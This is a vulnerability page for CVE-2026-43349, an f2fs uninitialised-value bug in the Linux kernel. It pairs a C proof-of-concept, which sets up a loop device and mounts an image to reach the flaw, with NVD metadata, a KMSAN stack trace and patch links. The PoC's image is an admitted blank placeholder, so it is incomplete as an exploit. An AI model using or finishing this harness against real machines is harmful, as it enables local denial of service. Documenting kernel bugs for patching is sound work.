CVE-2026-43349

/* * PoC for CVE-2026-43349: f2fs uninit-value access * This code simulates the conditions to trigger the vulnerability. * Requires local access and ability to mount f2fs filesystems. */ #include <stdio.h> #include <stdlib.h> #include <sys/mount.h> #include <sys/stat.h> #include <unistd.h> #include <fcntl.h> #include <linux/loop.h> int main() { const char* loop_device = "/dev/loop0"; const char* mount_point = "/mnt/f2fs_test"; const char* image_file = "crafted_f2fs.img"; int fd, loop_fd; // Setup: Create a dummy image file (In real scenario, this would be a crafted corrupted f2fs image) fd = open(image_file, O_RDWR | O_CREAT, 0644); if (fd < 0) { perror("Failed to create image"); return 1; } ftruncate(fd, 100 * 1024 * 1024); // 100MB close(fd); // Attach loop device loop_fd = open("/dev/loop-control", O_RDWR); ioctl(loop_fd, LOOP_CTL_ADD, 0); // Assuming loop0 is free close(loop_fd); loop_fd = open(loop_device, O_RDWR); fd = open(image_file, O_RDWR); if (ioctl(loop_fd, LOOP_SET_FD, fd) < 0) { perror("ioctl LOOP_SET_FD"); return 1; } close(fd); close(loop_fd); mkdir(mount_point, 0777); // Trigger: Attempt to mount the crafted image // If the image causes I/O read failure or has uninitialized footer, // the kernel path f2fs_sanity_check_node_footer will be hit. printf("[+] Attempting to mount crafted f2fs image to trigger bug...\n"); if (mount(loop_device, mount_point, "f2fs", 0, "") == 0) { printf("[+] Mount succeeded. If kernel is vulnerable, check dmesg for KMSAN warnings.\n"); umount(mount_point); } else { perror("[-] Mount failed (might be expected or image invalid)"); } // Cleanup loop_fd = open(loop_device, O_RDWR); ioctl(loop_fd, LOOP_CLR_FD, 0); close(loop_fd); unlink(image_file); return 0; }

{"cve": {"id": "CVE-2026-43349", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:44.997", "lastModified": "2026-05-15T19:09:19.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid uninit-value access in f2fs_sanity_check_node_footer\n\nsyzbot reported a f2fs bug as below:\n\nBUG: KMSAN: uninit-value in f2fs_sanity_check_node_footer+0x374/0xa20 fs/f2fs/node.c:1520\n f2fs_sanity_check_node_footer+0x374/0xa20 fs/f2fs/node.c:1520\n f2fs_finish_read_bio+0xe1e/0x1d60 fs/f2fs/data.c:177\n f2fs_read_end_io+0x6ab/0x2220 fs/f2fs/data.c:-1\n bio_endio+0x1006/0x1160 block/bio.c:1792\n submit_bio_noacct+0x533/0x2960 block/blk-core.c:891\n submit_bio+0x57a/0x620 block/blk-core.c:926\n blk_crypto_submit_bio include/linux/blk-crypto.h:203 [inline]\n f2fs_submit_read_bio+0x12c/0x360 fs/f2fs/data.c:557\n f2fs_submit_page_bio+0xee2/0x1450 fs/f2fs/data.c:775\n read_node_folio+0x384/0x4b0 fs/f2fs/node.c:1481\n __get_node_folio+0x5db/0x15d0 fs/f2fs/node.c:1576\n f2fs_get_inode_folio+0x40/0x50 fs/f2fs/node.c:1623\n do_read_inode fs/f2fs/inode.c:425 [inline]\n f2fs_iget+0x1209/0x9380 fs/f2fs/inode.c:596\n f2fs_fill_super+0x8f5a/0xb2e0 fs/f2fs/super.c:5184\n get_tree_bdev_flags+0x6e6/0x920 fs/super.c:1694\n get_tree_bdev+0x38/0x50 fs/super.c:1717\n f2fs_get_tree+0x35/0x40 fs/f2fs/super.c:5436\n vfs_get_tree+0xb3/0x5d0 fs/super.c:1754\n fc_mount fs/namespace.c:1193 [inline]\n do_new_mount_fc fs/namespace.c:3763 [inline]\n do_new_mount+0x885/0x1dd0 fs/namespace.c:3839\n path_mount+0x7a2/0x20b0 fs/namespace.c:4159\n do_mount fs/namespace.c:4172 [inline]\n __do_sys_mount fs/namespace.c:4361 [inline]\n __se_sys_mount+0x704/0x7f0 fs/namespace.c:4338\n __x64_sys_mount+0xe4/0x150 fs/namespace.c:4338\n x64_sys_call+0x39f0/0x3ea0 arch/x86/include/generated/asm/syscalls_64.h:166\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0x134/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe root cause is: in f2fs_finish_read_bio(), we may access uninit data\nin folio if we failed to read the data from device into folio, let's add\na check condition to avoid such issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18.13", "versionEndExcluding": "6.18.25", "matchCriteriaId": "A1B4E07B-2A42-4876-87B4-C1D7EC00F7AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19.3", "versionEndExcluding": "7.0", "matchCriteriaId": "4F3D8E46-B7D5-4D3B-B2E1-515A184085AA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.1", "versionEndExcluding": "7.0.2", "matchCriteriaId": "892296EC-C52B-40F8-9C2B-E023C2B6B4C6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/59970b2586fef4b13e96527b9d232bed30b640cd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7b9161a605e91d0987e2596a245dc1f21621b23f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a10b89343d41ceee1af0ec38d3a74e526c77fa09", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}